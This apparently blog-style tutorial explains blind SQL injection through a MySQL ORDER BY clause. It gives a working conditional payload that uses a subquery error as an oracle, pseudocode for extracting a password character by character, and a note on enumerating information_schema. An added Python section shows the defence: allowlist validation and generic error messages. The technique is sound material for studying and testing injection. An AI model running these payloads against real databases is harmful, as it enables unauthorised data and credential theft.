For example, suppose we have the query: SELECT * FROM users ORDER BY username {injection}
We have raw access to this query: the ASC or DESC keyword can be replaced with anything we want.
Injecting the following: ASC, IF (ASCII(SUBSTRING('password',1,1)) = 50,1,(SELECT 1 UNION SELECT 2)) LIMIT 1,1 --
There are two things that could happen. If the query executes normally, you know that the first character of the password has the ASCII value 50.
Note that this needs the query to return only one record; if it returns several, or you cannot escape the LIMIT clause, you may want to use a subquery instead of the direct ASCII(SUBSTRING()) method.
Anyway, back to the query: if the character is incorrect, the following message will appear when MySQL errors (mysql_error()) are printed: Subquery returns more than 1 row
So basically you need to write an exploit that, once a query has executed properly, records the matched character and moves on to the next position.
In pseudo code, something like this (the loop bounds below are reconstructed; the original listing lost them to formatting):
function get() {
    define charset
    define emptypassword
    define sql_injection_url_and_string
    for i = 1; i <= length; i++ {            // position in the string being recovered
        for x = 0; x < count(charset); x++ { // candidate character at that position
            if (post(sql_injection_url_and_string)) {
                // The query was successful
                emptypassword += charset(x); // the character that matched at this position
                break; // move to the next position
            }
        }
    }
    print emptypassword;
}
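The defensive side of the ORDER BY case above, as an added example that is not part of the original post: ORDER BY takes identifiers and keywords, which cannot be bound as query parameters, so the sort column and direction have to be matched against a fixed allowlist, and database error text must never be echoed to the client, since the "Subquery returns more than 1 row" message is exactly the true/false oracle the post relies on. The users table, its rows, the column names and the sqlite3 backend are constructed for this demo.

```python
import logging
import sqlite3

log = logging.getLogger("orderby-demo")

# ORDER BY takes identifiers and keywords, which cannot be bound as query
# parameters, so the only safe handling of a sort request is exact-match
# validation against a fixed allowlist (constructed for this demo).
ALLOWED_SORT_COLUMNS = ("username", "created_at")
ALLOWED_DIRECTIONS = ("ASC", "DESC")


def build_user_query(sort_column: str, direction: str) -> str:
    """Return the SELECT with a validated ORDER BY, or raise ValueError.

    Nothing from the request is copied into the SQL text; only the
    matching allowlist entry is used, so extra tokens are impossible.
    """
    if sort_column not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column")
    wanted = direction.upper()
    if wanted not in ALLOWED_DIRECTIONS:
        raise ValueError("unsupported sort direction")
    return f"SELECT username FROM users ORDER BY {sort_column} {wanted}"


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the post's table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, created_at TEXT)")
    conn.executemany(
        "INSERT INTO users (username, created_at) VALUES (?, ?)",
        [("carol", "2023-01-03"), ("alice", "2023-01-01"), ("bob", "2023-01-02")],
    )
    return conn


def fetch_usernames(conn: sqlite3.Connection, sort_column: str, direction: str) -> list:
    return [row[0] for row in conn.execute(build_user_query(sort_column, direction))]


def handle_request(conn: sqlite3.Connection, sort_column: str, direction: str) -> tuple:
    """Endpoint-style wrapper returning (status, body). Database errors are
    logged server-side and answered generically, so messages such as
    "Subquery returns more than 1 row" never reach the client as an oracle."""
    try:
        return 200, fetch_usernames(conn, sort_column, direction)
    except ValueError:
        return 400, "invalid sort parameter"
    except sqlite3.Error:
        log.exception("user listing query failed")
        return 500, "internal error"
```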
I applied this method for finding table names and columns from information_schema.tables and information_schema.columns.
This kind of SQL injection is the one I enjoy the most. It's not as easy as the UNION SELECT command; it requires some thinking and writing an exploit.